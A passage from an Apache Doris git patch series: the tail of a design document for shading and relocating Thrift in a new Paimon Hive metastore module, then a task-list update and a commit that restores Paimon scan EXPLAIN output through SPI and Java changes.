`paimon-hive-connector-3.1-1.3.1.jar` with **original-package** +`org.apache.thrift.*` references throughout (verified: `CachedClientPool` references +`org.apache.thrift.TException`; `HiveMetaStoreClient` references +`org.apache.thrift.transport.TFramedTransport`). + +You cannot satisfy both consumers at the original package in one loader: +- Bundling old `libthrift-0.9.3` (original package) into the plugin would supply + `TFramedTransport` and fix the HMS path — **but** it would also put original-package + `org.apache.thrift.TBase` into the plugin, which now loads **child-first** and splits from + the host 0.16.0 `TBase`/doris-gen `TFileScanRangeParams` → re-introduces exactly the RC-1 + `IncompatibleClassChangeError`. This is the trap the pom comment at line ~156 names ("stays + parent-first like the other connectors"). +- Keeping libthrift parent-first (current state) means the HMS path's old-package + `TFramedTransport` is unsatisfiable. + +The conflict is structural: **one original `org.apache.thrift.*` namespace, two incompatible +versions required.** The fix must move the HMS client's thrift to a *different* package so the +two consumers stop sharing a namespace. + +## The codebase already solved this exact problem (decisive precedent) + +`org.apache.doris:hive-catalog-shade` (module pom at the doris-shade tree; verified copy at +`/mnt/disk1/yy/git/doris-shade/hive-catalog-shade/pom.xml`) uses `maven-shade-plugin` to: +- bundle `hive-metastore:3.1.3` (`HiveMetaStoreClient` at **original** hive package) **and** + `paimon-hive-connector-3.1` + `paimon-hive-common` (`paimon.version` = **1.3.1**, the exact + artifact we ship), and +- **relocate** `org.apache.thrift` → `shade.doris.hive.org.apache.thrift`. + +Verified in `hive-catalog-shade-3.1.1.jar` / `-3.1.2-SNAPSHOT.jar`: +- paimon `CachedClientPool` → `shade.doris.hive.org.apache.thrift.TException` (relocated) +- `HiveMetaStoreClient` → `shade.doris.hive.org.apache.thrift.transport.TFramedTransport` + (relocated, **present** in the jar) +- **No** original-package `org.apache.thrift.*` class anywhere in the shade jar. + +So when the shaded `HiveMetaStoreClient`'s constructors are reflected, the JVM loads +`shade.doris.hive.org.apache.thrift.transport.TFramedTransport` — which exists in the jar — and +the doris-gen `TSerializer`/`TBase` 0.16.0 path is left completely untouched (it never touches +`shade.doris.hive.*`). + +**Caveat that rules out "just depend on the existing shade as-is":** `hive-catalog-shade-3.1.1` +(the version pinned by `doris.hive.catalog.shade.version=3.1.1`) bundles **un-relocated, +original-package fastutil 6.5.x** (the fastutil relocation was only added in the unreleased +3.1.2-SNAPSHOT pom). Bundled into our **child-first** plugin, that ancient +`it.unimi.dsi.fastutil.longs.Long2ObjectOpenHashMap` would shadow the modern +`fastutil(-core)` on the FE classpath → `NoSuchMethodError` (exactly the collision the paimon +pom comment at lines 135-139 already avoids by using plain `hive-common` instead of the shade). +The existing shade jar is also ~127 MB (hive-exec core + iceberg-hive-metastore + DLF), most of +which the paimon plugin does not need. + +--- + +# Design + +## Option evaluation + +### Option (b) — disable the TFramedTransport constructor probe via config — REJECTED +The decompiled `RetryingMetaStoreClientFactory` (verified bytecode) has **no flag** that skips +the constructor probe. `createClient` iterates a fixed `PROXY_SUPPLIERS` map; the +`constructorDetectedHiveMetastoreProxySupplier` entry that triggers `getDeclaredConstructors0` +is hard-wired. The `PROXY_SUPPLIERS_SHADED` map is *added* (not substituted) and only when the +target class name equals the original `HiveMetaStoreClient` name; it does not avoid loading +`HiveMetaStoreClient`'s constructor signatures. **No safe config switch exists.** Even if the +probe were skipped, the actual client instantiation still loads `TFramedTransport` at connect +time. Rejected. + +### Option (c) — lighter alternatives — REJECTED +- *Bundle old `libthrift-0.9.3` original-package*: re-breaks RC-1 (TBase split). Rejected. +- *Bundle host 0.16.0 libthrift child-first*: 0.16.0 lacks old-package `TFramedTransport`; does + not fix the HMS path and additionally risks the TBase split. Rejected. +- *Hand-relocate only `TFramedTransport`*: the metastore client transitively touches a large + thrift surface (`TSocket`, `TTransport`, `TBinaryProtocol`, `TException`, ...); partial + relocation produces an inconsistent namespace. Must relocate the whole `org.apache.thrift` + tree, which is what shading does. Rejected as a manual variant of (a). +- *Depend on the existing `hive-catalog-shade-3.1.1` artifact directly*: fastutil-6.5.x + collision (above) + 127 MB. Rejected. (Bumping the pinned shade to 3.1.2-SNAPSHOT to get the + fastutil relocation is possible but couples paimon to an unreleased shade and still ships the + 127 MB hive-exec/iceberg payload — not preferred.) + +### Option (a) — new paimon-scoped shaded module — CHOSEN + +Create a small, paimon-dedicated shade module that bundles **only** the paimon-hive + Thrift +metastore-client closure and relocates `org.apache.thrift` (and fastutil, defensively) to a +**paimon-private prefix**. `fe-connector-paimon` depends on this shaded artifact instead of raw +`paimon-hive-connector-3.1` + `hive-metastore-2.3.7` + `hive-common`. The main module keeps +its own original-package 0.16.0 thrift path (parent-first, untouched). + +**Why a SEPARATE module and not shade `fe-connector-paimon` itself:** shading the connector +module would relocate `org.apache.thrift` *everywhere*, including +`PaimonScanPlanProvider`'s `org.apache.thrift.TSerializer` call on the host doris-gen +`TFileScanRangeParams` (which implements host 0.16.0 `org.apache.thrift.TBase`). Relocating that +to `org.apache.doris.paimon.shaded.thrift.TSerializer` while `TFileScanRangeParams` stays +`org.apache.thrift.TBase` would break serialization (no `TSerializer` for the host TBase). The +relocation must be confined to the metastore-client dependency tree, which a separate shade +module achieves cleanly. (This is the same reason `hive-catalog-shade` is its own module rather +than shading fe-core.) + +## Module: `fe-connector-paimon-hive-shade` + +Location: `fe/fe-connector/fe-connector-paimon-hive-shade/` (sibling of +`fe-connector-paimon`). Registered in `fe/fe-connector/pom.xml` `` **before** +`fe-connector-paimon` (build-order: the connector depends on it). + +Coordinates: `org.apache.doris:fe-connector-paimon-hive-shade:${revision}`, packaging `jar`. + +**Relocation prefix:** `org.apache.doris.paimon.shaded.thrift` +(distinct from `shade.doris.hive.org.apache.thrift` so it never collides with a parent-first +hive-catalog-shade should both ever coexist; paimon-private). + +**Bundled (shaded-in) deps:** +- `org.apache.paimon:paimon-hive-connector-3.1:${paimon.version}` (1.3.1) — supplies + `org.apache.paimon.hive.HiveCatalogFactory`, `HiveCatalog`, `RetryingMetaStoreClientFactory`, + `CachedClientPool`, etc. +- `org.apache.hive:hive-metastore:2.3.7` (current RC-5 version, with the same server-side + exclusions already in the connector pom: datanucleus/derby/bonecp/HikariCP/jdo/hbase/tephra, + the stale hadoop-2.7.2 trio, guava, protobuf, logback/log4j12). The 2.3.7 `HiveMetaStoreClient` + is the one whose `TFramedTransport` reference must be relocated. +- `org.apache.hive:hive-common:${hive.common.version}` (2.3.9) — supplies `HiveConf`. Bundling + it here (instead of separately in the connector) keeps `HiveConf`, `HiveMetaStoreClient`, and + paimon's factory **one consistent hive version (2.3.x)** inside one artifact, so the + reflective `getProxy(HiveConf, ...)` / constructor signatures match by class identity. +- libfb303 rides transitively (paimon/hive metastore need it). +- `org.apache.thrift:libthrift:0.9.3` — **bundled and relocated**. This is the source of + old-package `TFramedTransport`; after relocation it becomes + `org.apache.doris.paimon.shaded.thrift.transport.TFramedTransport`, matching the relocated + references in the shaded `HiveMetaStoreClient`/paimon classes. (libthrift's transitive + `httpcore`/`httpclient` go to `provided`/excluded as hive-catalog-shade does.) + +**Provided / excluded (NOT shaded in)** — resolved at runtime from the plugin's own child-first +lib or the host (must NOT be duplicated/relocated): +- `org.apache.hadoop:*` (hadoop-common / hadoop-client-api / hadoop-aws already bundled in the + connector plugin; `Configuration`/`HiveConf`-vs-`Configuration` identity stays with the + plugin's hadoop) → `org.apache.hadoop:*` in `artifactSet`. +- `org.apache.paimon:paimon-core` / `paimon-common` / `paimon-format` → **excluded** from the + shade (they come from the connector plugin; paimon-core must stay one copy). Only + `paimon-hive-connector-3.1` (the hive-metastore glue) is shaded here. +- `org.slf4j:*`, `org.apache.logging.log4j:*`, `commons-logging:*` → excluded (host). +- `com.google.guava:*`, `com.google.protobuf:*` → excluded (host/plugin). +- `org.apache.commons:*`, `commons-io:*`, `commons-codec:*` → excluded (host/plugin). + +**Relocations:** +```xml + + org.apache.thrift + org.apache.doris.paimon.shaded.thrift + + + + it.unimi.dsi.fastutil + org.apache.doris.paimon.shaded.fastutil + +``` +(`createDependencyReducedPom>false` is fine for an internal artifact; add the standard +`META-INF/*.SF|DSA|RSA` + `META-INF/maven/**` filter as hive-catalog-shade does.) + +**Crucially do NOT relocate** `org.apache.paimon.*` (paimon classes stay at their real +package so the connector's SPI discovery of `org.apache.paimon.hive.HiveCatalogFactory` and the +`Catalog`/`HiveCatalog` types still line up with `paimon-core`) and **do NOT relocate** +`org.apache.hadoop.*` (so the shaded `HiveMetaStoreClient`'s `Configuration`/`HiveConf` are the +same classes the plugin's hadoop-common + this module's hive-common define). + +## How `fe-connector-paimon` changes + +In `fe/fe-connector/fe-connector-paimon/pom.xml`: +- **Remove** the raw `org.apache.paimon:paimon-hive-connector-3.1` dependency (lines 82-85). +- **Remove** the raw `org.apache.hive:hive-metastore:2.3.7` dependency block (lines 159-192) + including its long exclusion list. +- **Remove** the raw `org.apache.hive:hive-common` dependency (lines 140-143) — `HiveConf` now + comes (relocated-thrift-free, hive-2.3.9) from the shade module. +- **Add** `org.apache.doris:fe-connector-paimon-hive-shade:${project.version}`. +- Keep the `org.apache.thrift:libthrift` in both the pom (n/a now — no + hive-metastore dep to exclude from) and **keep** the `plugin-zip.xml` exclude of + `org.apache.thrift:libthrift` and `org.apache.doris:fe-thrift` (unchanged — the doris-gen + TBase path still needs parent-first 0.16.0). The shade module carries its thrift relocated, so + there is no original-package `org.apache.thrift.*` introduced into the plugin by this change. + +`plugin-zip.xml` already bundles all non-excluded runtime deps into `lib/`, so the new shade jar +lands in `fe/plugins/connector/paimon/lib/` automatically. + +## Interaction with RC-1 (the TBase split) — preserved + +The plugin after this change contains: +- `org.apache.thrift.*` (the doris-gen serialization namespace): **absent** from the plugin + (libthrift still excluded) → resolves parent-first to host 0.16.0. `PaimonScanPlanProvider`'s + `TSerializer.serialize(TFileScanRangeParams)` keeps working. ✅ +- `org.apache.doris.paimon.shaded.thrift.*` (the HMS client namespace): present in the shade + jar, loaded child-first, self-consistent (paimon hive + HiveMetaStoreClient + libthrift 0.9.3 + all relocated to it). The doris-gen path never references this namespace. ✅ + +No original-package `org.apache.thrift.*` is added to the plugin → **RC-1 cannot regress.** + +--- + +# Implementation Plan + +1. **Create module** `fe/fe-connector/fe-connector-paimon-hive-shade/pom.xml`: + - parent `org.apache.doris:fe-connector:${revision}`, artifactId + `fe-connector-paimon-hive-shade`, packaging `jar`. + - dependencies: `paimon-hive-connector-3.1` (`${paimon.version}`, exclude hadoop-common/hdfs, + hive-metastore [we pin 2.3.7 ourselves], jackson-yaml, httpclient5, RoaringBitmap — mirror + the existing connector exclusions), `hive-metastore:2.3.7` (server-side exclusions as in the + current connector pom lines 163-191), `hive-common:${hive.common.version}`, + `libthrift:0.9.3`. Mark `hadoop-common`, `paimon-core`, slf4j/log4j as `provided`. + - `maven-shade-plugin` execution copying the hive-catalog-shade pattern: `artifactSet` + excludes (hadoop, paimon-core/common/format, guava, protobuf, slf4j, log4j, commons-*, + gson, jackson), the `META-INF` filter, and the two relocations above. +2. **Register module** in `fe/fe-connector/pom.xml` `` *before* `fe-connector-paimon`. + Add a `dependencyManagement` entry for `libthrift:0.9.3` and (if not present) + `hive-metastore:2.3.7` near the paimon entries in `fe/pom.xml`, or pin versions inline in the + shade module. +3. **Edit** `fe/fe-connector/fe-connector-paimon/pom.xml`: swap raw + paimon-hive-connector/hive-metastore/hive-common for the shade dependency (above). +4. **No production Java change.** `PaimonCatalogFactory.buildHmsHiveConf/buildDlfHiveConf` use + only `new HiveConf()` + `HiveConf.set(k,v)` (verified) — version-agnostic; the relocation is + transparent to that code because paimon (`org.apache.paimon.*`) and hadoop/hive + (`org.apache.hadoop.hive.conf.HiveConf`) packages are *not* relocated. +5. **Build + unzip verification** (see Test Plan). +6. **Docker external suite** (`enablePaimonTest=true`) is the real gate. + +Files touched: +- NEW `fe/fe-connector/fe-connector-paimon-hive-shade/pom.xml` +- `fe/fe-connector/pom.xml` (`` + version mgmt) +- `fe/fe-connector/fe-connector-paimon/pom.xml` (dependency swap) +- possibly `fe/pom.xml` (dependencyManagement for libthrift 0.9.3 / hive-metastore 2.3.7) + +--- + +# Risk Analysis + +1. **Thrift 0.9.3 vs host 0.16.0 wire handshake (already flagged by RC-5).** The metastore + client now speaks Thrift **0.9.3** to the CI docker HMS. HMS's TBinaryProtocol/TSocket wire + format is stable across 0.9.x↔0.16 for the metastore RPCs in practice, and the legacy fe-core + path already used a 2.3.x metastore client over an old thrift against the same docker HMS — so + this is the same wire version legacy shipped, not a new risk introduced here. **Not statically + provable; gated by the docker paimon suite.** (Identical caveat to the RC-5 comment.) + +2. **Relocation must not break `RetryingMetaStoreClientFactory`'s reflection.** The factory + reflects on hive classes by **original** name (`HiveMetaStoreClient`, + `RetryingMetaStoreClient`, `HiveMetaHookLoader`, `HiveConf`) — these are **not** relocated, so + `Class.forName`/`getMethod("getProxy", ...)` still match. The thrift classes it touches only + transitively (via `HiveMetaStoreClient` constructor signatures) **are** relocated, **and** the + shaded `HiveMetaStoreClient` bytecode references the **same** relocated names (verified in + hive-catalog-shade that shade rewrites both consistently). Maven-shade rewrites bytecode + references and signatures together, so the relocation is internally consistent. **Low risk**, + backed by the working hive-catalog-shade precedent that ships the identical paimon 1.3.1 + + metastore + relocated-thrift combination. + +3. **DLF `ProxyMetaStoreClient` path** (`PaimonCatalogFactory:428` sets + `metastore.client.class = com.aliyun.datalake.metastore.hive2.ProxyMetaStoreClient`). The DLF + client is **not** in this shade module (it lives in `metastore-client-hive3` / DLF SDK, not + bundled in the paimon plugin today either). DLF was already a cutover-gated unknown (pom NOTE + lines 175-182). This fix does not regress DLF, but **does not add DLF either** — DLF remains + gated by live-e2e and is out of scope for the HMS `NoClassDefFound` fix. Flag for the DLF + ticket: when DLF is wired, its `ProxyMetaStoreClient` references original-package + `org.apache.thrift.*`; it would need to be relocated together (added to this shade module's + artifactSet) to stay consistent. + +4. **Fastutil collision** — neutralized by the defensive `it.unimi.dsi.fastutil` relocation in + this module (the reason we build a paimon-scoped shade instead of reusing + hive-catalog-shade-3.1.1 which ships un-relocated fastutil). + +5. **Two paimon-hive copies?** The shade jar contains `org.apache.paimon.hive.*` (not relocated). + The connector plugin must NOT also carry a raw `paimon-hive-connector-3.1.jar` (we remove that + dep in step 3). Verify post-build that `paimon-hive-connector-3.1-*.jar` is **gone** from + `lib/` and only the shade jar provides `org.apache.paimon.hive.*` — otherwise a child-first + duplicate-class hazard. (paimon-**core** stays as its own jar; the shade excludes it.) + +6. **HiveConf class identity across the plugin.** The shade bundles hive-common 2.3.9 `HiveConf`; + the connector's `buildHmsHiveConf` constructs `new HiveConf()` resolved child-first from the + shade. Because both the `HiveConf` instance and the `getProxy(HiveConf,...)` signature come + from the same (shaded) hive-2.3.9, identity matches. **Low risk**; verify no second + `org.apache.hadoop.hive.conf.HiveConf` remains in `lib/` after removing the raw hive-common + dep. + +--- + +# Test Plan + +## Unit Tests + +- The existing `fe-connector-paimon` UTs (`PaimonCatalogFactoryTest`, the offline + `PaimonTableSerdeRoundTripTest`, the 46-test suite referenced in CI 968880) must still pass + unchanged. They exercise `buildHmsHiveConf`/`buildDlfHiveConf` (HiveConf assembly), flavor + resolution, and the FE→BE serde round-trip — the last one transitively exercises the + **doris-gen TSerializer (0.16.0) path** that RC-1 protects, so a green round-trip test is the + unit-level guard that the shade change did not re-split `TBase`. No new UT is needed: the + failure is a packaging/classloader fault that **cannot reproduce in a single-classloader UT** + (the whole point of the RC-5/RC-1 lineage — these bugs only surface under the docker + plugin-zip child-first loader). +- Run: `mvn -pl fe/fe-connector/fe-connector-paimon -am test` (the `-am` is required, per the + repo's `${revision}` gotcha, to also build the new shade module). + +## E2E Tests + +**Static jar verification (proves the class is now reachable, before docker):** +1. `mvn -pl fe/fe-connector/fe-connector-paimon-hive-shade,fe/fe-connector/fe-connector-paimon + -am package` +2. Assert the relocated class is present in the shade jar: + `unzip -l .../fe-connector-paimon-hive-shade/target/*.jar | grep + 'org/apache/doris/paimon/shaded/thrift/transport/TFramedTransport.class'` → must be **1 hit**. +3. Assert the shaded `HiveMetaStoreClient` references the relocated name: + `unzip -p .../shade.jar org/apache/hadoop/hive/metastore/HiveMetaStoreClient.class | strings | + grep 'paimon/shaded/thrift/transport/TFramedTransport'` → must hit (and the original + `org/apache/thrift/transport/TFramedTransport` must **not** appear). +4. Assert **no** original-package `org/apache/thrift/` class in the final plugin zip's `lib/` + except none-at-all (libthrift still excluded): + `unzip -l .../doris-fe-connector-paimon.zip | grep -E 'lib/.*(libthrift|paimon-hive-connector-3.1-)'` + → **no** raw `paimon-hive-connector-3.1` jar, **no** libthrift jar; the shade jar present. +5. Assert paimon-core is still a single jar and `org.apache.paimon.hive.*` is provided only by + the shade. + +**Docker external suite (the real gate, `enablePaimonTest=true`):** +- `external_table_p0/paimon/test_paimon_table.groovy::test_create_paimon_table` (line 44) — the + `metastore=hive` create that currently throws `NoClassDefFoundError`. Must create the catalog + and pass. +- `external_table_p0/paimon/test_paimon_statistics.groovy` (line 33) — same HMS catalog + + ANALYZE/statistics read. +- Regression-only sanity that the non-HMS flavors still work and RC-1 did not regress: + `test_paimon_jdbc_catalog.groovy` (jdbc), and any filesystem/REST paimon read suite (exercises + `PaimonScanPlanProvider` → the doris-gen 0.16.0 TSerializer path) must stay green. + +This bug class is **docker-plugin-zip-only**; local UTs and a single-loader run cannot catch it, +so a green docker `enablePaimonTest=true` run on these two suites (plus an unbroken jdbc/scan +suite) is the acceptance gate. diff --git a/plan-doc/task-list.md b/plan-doc/task-list.md index 30c6e5fa8e4a95..e465b011ec5845 100644 --- a/plan-doc/task-list.md +++ b/plan-doc/task-list.md @@ -3,10 +3,10 @@ Build 968994 (commit 3d93f195eff). 32 failures. Root: recent self-contained packaging commits are internally incomplete + one SPI explain-gap regression. F (hive_ctas) = stale, excluded. -- [ ] FIX-A — bundle s3-transfer-manager (Class A: s3 FileIO/AWS SDK interceptor skew; 6 direct + 18 collateral) -- [ ] FIX-B — bundle hadoop-huaweicloud (Class B: obs cross-loader cast; paimon_base_filesystem) -- [ ] FIX-C — relocated libthrift for paimon HMS client (Class C: TFramedTransport NoClassDefFound; 2 tests) -- [ ] FIX-E — PluginDrivenScanNode/PaimonScanPlanProvider explain emission (Class E: 5 explain-mismatch) +- [x] FIX-A — bundle s3-transfer-manager (Class A: s3 FileIO/AWS SDK interceptor skew; 6 direct + 18 collateral) — `75496c94e36` +- [x] FIX-B — bundle hadoop-huaweicloud (Class B: obs cross-loader cast; paimon_base_filesystem) — `3c7adfe1de1` +- [ ] FIX-C — paimon-hive-shade module, relocate thrift (Class C: TFramedTransport NoClassDefFound; 2 tests) — design: fix-c-hms-thrift-design.md +- [ ] FIX-E — PluginDrivenScanNode/PaimonScanPlanProvider explain emission (Class E: 5 explain-mismatch) — design: fix-e-explain-gap-design.md Excluded: - F — external_table_p0.hive.write.test_hive_ctas_to_doris: pre-existing stale test (auto-partition-name From b8cd74c33e04ac82a7fb52839585dea2f3efc5a0 Mon Sep 17 00:00:00 2001 From: morningman Date: Sat, 13 Jun 2026 21:14:18 +0800 Subject: [PATCH 059/128] =?UTF-8?q?fix:=20FIX-PAIMON-EXPLAIN-GAP=20?= =?UTF-8?q?=E2=80=94=20re-emit=20paimon=20scan=20EXPLAIN=20lines=20dropped?= =?UTF-8?q?=20by=20SPI=20cutover=20(CI=20968994)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit - root cause: PluginDrivenScanNode.getNodeExplainString is a full override that does NOT call super (FileScanNode), so the SPI paimon scan path silently dropped explain lines the legacy PaimonScanNode emitted: 'pushdown agg=COUNT (n)', the VERBOSE dataFileNum/deleteFileNum/ deleteSplitNum block, and 'paimonNativeReadSplits=/'. The 5 tests are PURE DISPLAY gaps — data queries return correct values; only the explain text was missing the lines (plugindriven-explain-override-gap re-manifested for paimon). - solution (paimon-gated so other plugin connectors stay byte-unchanged): * SPI: ConnectorScanRange.getPushDownRowCount() (-1 default) + isNativeReadRange() (false default); ConnectorScanPlanProvider.getDeleteFiles(TTableFormatFileDesc) (empty default). * PaimonScanRange overrides the two getters (paimon.row_count / paimon.split). * PaimonScanPlanProvider.appendExplainInfo emits paimonNativeReadSplits from synthetic count keys the node injects; getDeleteFiles ports legacy PaimonScanNode.getDeleteFiles. * FileScanNode: behavior-neutral extract-method appendBackendScanRangeDetail (verbatim VERBOSE block). * PluginDrivenScanNode: accumulate native/total + pushdown-count in getSplits (pure statics); override getDeleteFiles; emit 'pushdown agg' UNGATED (restores the line FileScanNode emits for every other scan node), VERBOSE delete block paimon-gated, paimonNativeReadSplits paimon-only. - fixes Class E: test_paimon_count, test_paimon_deletion_vector, test_paimon_deletion_vector_oss, test_paimon_catalog_varbinary, test_paimon_catalog_timestamp_tz. - tests (independently re-run, build cache disabled): PluginDrivenScanNodeExplainStatsTest 7/7, PluginDrivenScanNodeDeleteFilesTest 4/4, PaimonScanExplainTest 9/9; existing PluginDrivenScanNodePartitionCountTest 5/5 (no shared-node regression). Tests encode WHY (the -1 sentinel survival, 0/N native accounting). Runtime gate: docker enablePaimonTest=true comparison-mode run cross-checks the values vs .out. - shared FileScanNode/PluginDrivenScanNode changes verified non-perturbing to es/jdbc/maxcompute/ iceberg/hive (extract is byte-identical; pushdown agg matches FileScanNode's unconditional emit). Design: plan-doc/fix-e-explain-gap-design.md. Co-Authored-By: Claude Opus 4.8 (1M context) --- .../api/scan/ConnectorScanPlanProvider.java | 16 + .../api/scan/ConnectorScanRange.java | 25 ++ .../paimon/PaimonScanPlanProvider.java | 58 +++ .../connector/paimon/PaimonScanRange.java | 26 ++ .../paimon/PaimonScanExplainTest.java | 175 ++++++++++ .../apache/doris/datasource/FileScanNode.java | 136 ++++---- .../datasource/PluginDrivenScanNode.java | 116 +++++- .../PluginDrivenScanNodeDeleteFilesTest.java | 115 ++++++ .../PluginDrivenScanNodeExplainStatsTest.java | 146 ++++++++ plan-doc/fix-e-explain-gap-design.md | 330 ++++++++++++++++++ plan-doc/task-list.md | 4 +- 11 files changed, 1081 insertions(+), 66 deletions(-) create mode 100644 fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanExplainTest.java create mode 100644 fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenScanNodeDeleteFilesTest.java create mode 100644 fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenScanNodeExplainStatsTest.java create mode 100644 plan-doc/fix-e-explain-gap-design.md diff --git a/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/scan/ConnectorScanPlanProvider.java b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/scan/ConnectorScanPlanProvider.java index 18f57dc1140910..6dbc3b8e6df511 100644 --- a/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/scan/ConnectorScanPlanProvider.java +++ b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/scan/ConnectorScanPlanProvider.java @@ -22,6 +22,7 @@ import org.apache.doris.connector.api.handle.ConnectorTableHandle; import org.apache.doris.connector.api.pushdown.ConnectorExpression; import org.apache.doris.thrift.TFileScanRangeParams; +import org.apache.doris.thrift.TTableFormatFileDesc; import java.util.Collections; import java.util.List; @@ -296,6 +297,21 @@ default void appendExplainInfo(StringBuilder output, // Default: no extra EXPLAIN info } + /** + * Returns the delete-file paths carried by one scan range's table-format descriptor, for the + * VERBOSE per-backend EXPLAIN block ({@code deleteFileNum}/{@code deleteSplitNum}). + * + *

      The default returns an empty list, so connectors without merge-on-read deletes contribute + * nothing. A connector that threads delete files onto its per-range thrift (e.g. Paimon's + * deletion vectors) overrides this to read them back from {@code tableFormatParams}.

      + * + * @param tableFormatParams the per-range table-format descriptor (may be {@code null}) + * @return the delete-file paths for this range (default: empty) + */ + default List getDeleteFiles(TTableFormatFileDesc tableFormatParams) { + return Collections.emptyList(); + } + /** * Returns the serialized table representation for this connector, * or {@code null} if not applicable. diff --git a/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/scan/ConnectorScanRange.java b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/scan/ConnectorScanRange.java index 2bab45080b24e4..7704b9e4ce081d 100644 --- a/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/scan/ConnectorScanRange.java +++ b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/scan/ConnectorScanRange.java @@ -113,6 +113,31 @@ default List getDeleteFiles() { return Collections.emptyList(); } + /** + * Returns the precomputed pushed-down COUNT(*) row count this range carries, or {@code -1} when + * the range carries no precomputed count. + * + *

      When a no-grouping {@code COUNT(*)} is pushed down, a connector that can produce a precomputed + * row count (e.g. Paimon's collapsed count range) surfaces the summed total here so the scan node + * can render the EXPLAIN {@code pushdown agg=COUNT (n)} line. Ranges with no precomputed count keep + * the {@code -1} default, which renders as the {@code (-1)} sentinel.

      + */ + default long getPushDownRowCount() { + return -1; + } + + /** + * Whether this range is read by BE's NATIVE (ORC/Parquet) reader rather than the JNI scanner. + * + *

      Used by a connector that distinguishes native vs JNI sub-splits (e.g. Paimon) so the scan + * node can accumulate the native/total split counts for the EXPLAIN + * {@code paimonNativeReadSplits=/} line. The default is {@code false} (JNI), so + * connectors without a native read path are unaffected.

      + */ + default boolean isNativeReadRange() { + return false; + } + /** * Populates per-range Thrift params from this scan range's data. * diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java index 38bc8cbfcf549c..d56f3463423487 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java @@ -26,7 +26,10 @@ import org.apache.doris.connector.spi.ConnectorContext; import org.apache.doris.thrift.TColumnType; import org.apache.doris.thrift.TFileScanRangeParams; +import org.apache.doris.thrift.TPaimonDeletionFileDesc; +import org.apache.doris.thrift.TPaimonFileDesc; import org.apache.doris.thrift.TPrimitiveType; +import org.apache.doris.thrift.TTableFormatFileDesc; import org.apache.doris.thrift.schema.external.TArrayField; import org.apache.doris.thrift.schema.external.TField; import org.apache.doris.thrift.schema.external.TFieldPtr; @@ -165,6 +168,15 @@ public class PaimonScanPlanProvider implements ConnectorScanPlanProvider { // also pushed into history_schema_info under this key (PaimonScanNode.doInitialize -> -1L). private static final long CURRENT_SCHEMA_ID = -1L; + // FIX-E (explain gap): synthetic node-property keys the generic PluginDrivenScanNode injects into + // the props map it passes to appendExplainInfo, carrying the per-scan native/total split counts it + // accumulated from ConnectorScanRange.isNativeReadRange(). They are NOT real connector properties + // (never sent to BE) — only this provider's appendExplainInfo reads them, to re-emit the legacy + // PaimonScanNode "paimonNativeReadSplits=/" line. Keys are byte-identical to the + // PluginDrivenScanNode constants so the inject/consume sides stay in lockstep. + private static final String NATIVE_READ_SPLITS_KEY = "__native_read_splits"; + private static final String TOTAL_READ_SPLITS_KEY = "__total_read_splits"; + private final Map properties; private final PaimonCatalogOps catalogOps; private final ConnectorContext context; @@ -1015,6 +1027,52 @@ public void populateScanLevelParams(TFileScanRangeParams params, } } + /** + * FIX-E (explain gap): re-emits the legacy {@code PaimonScanNode} EXPLAIN line + * {@code paimonNativeReadSplits=/} (native ORC/Parquet sub-splits over all splits). + * The generic {@code PluginDrivenScanNode} accumulates the counts from + * {@link ConnectorScanRange#isNativeReadRange()} in {@code getSplits} and injects them into the + * props map via the {@link #NATIVE_READ_SPLITS_KEY}/{@link #TOTAL_READ_SPLITS_KEY} synthetic keys, + * so this connector owns the paimon-specific string without an SPI signature change. Skipped when + * the keys are absent (e.g. EXPLAIN rendered before any split accounting, or another connector's + * props map) so the line never prints {@code 0/0} spuriously. + */ + @Override + public void appendExplainInfo(StringBuilder output, String prefix, + Map nodeProperties) { + String nativeSplits = nodeProperties.get(NATIVE_READ_SPLITS_KEY); + String totalSplits = nodeProperties.get(TOTAL_READ_SPLITS_KEY); + if (nativeSplits != null && totalSplits != null) { + output.append(prefix).append("paimonNativeReadSplits=") + .append(nativeSplits).append("/").append(totalSplits).append("\n"); + } + } + + /** + * FIX-E (explain gap): reads the deletion-vector file path carried by one scan range's + * {@link TPaimonFileDesc}, for the VERBOSE per-backend EXPLAIN block + * ({@code deleteFileNum}/{@code deleteSplitNum}). Verbatim port of legacy + * {@code PaimonScanNode.getDeleteFiles} (reading {@code getPaimonParams().getDeletionFile() + * .getPath()}); the generic {@code PluginDrivenScanNode.getDeleteFiles(TFileRangeDesc)} delegates + * here. Returns empty when the range carries no paimon params or no deletion file. + */ + @Override + public List getDeleteFiles(TTableFormatFileDesc tableFormatParams) { + List deleteFiles = new ArrayList<>(); + if (tableFormatParams == null || !tableFormatParams.isSetPaimonParams()) { + return deleteFiles; + } + TPaimonFileDesc paimonParams = tableFormatParams.getPaimonParams(); + if (paimonParams == null || !paimonParams.isSetDeletionFile()) { + return deleteFiles; + } + TPaimonDeletionFileDesc deletionFile = paimonParams.getDeletionFile(); + if (deletionFile != null && deletionFile.isSetPath()) { + deleteFiles.add(deletionFile.getPath()); + } + return deleteFiles; + } + /** * FIX-SCHEMA-EVOLUTION (B-1a): builds the native-reader schema dictionary * ({@code current_schema_id} + {@code history_schema_info}) for {@code table} and serializes it for diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanRange.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanRange.java index 9277c42c77b82d..ab683859de38d9 100644 --- 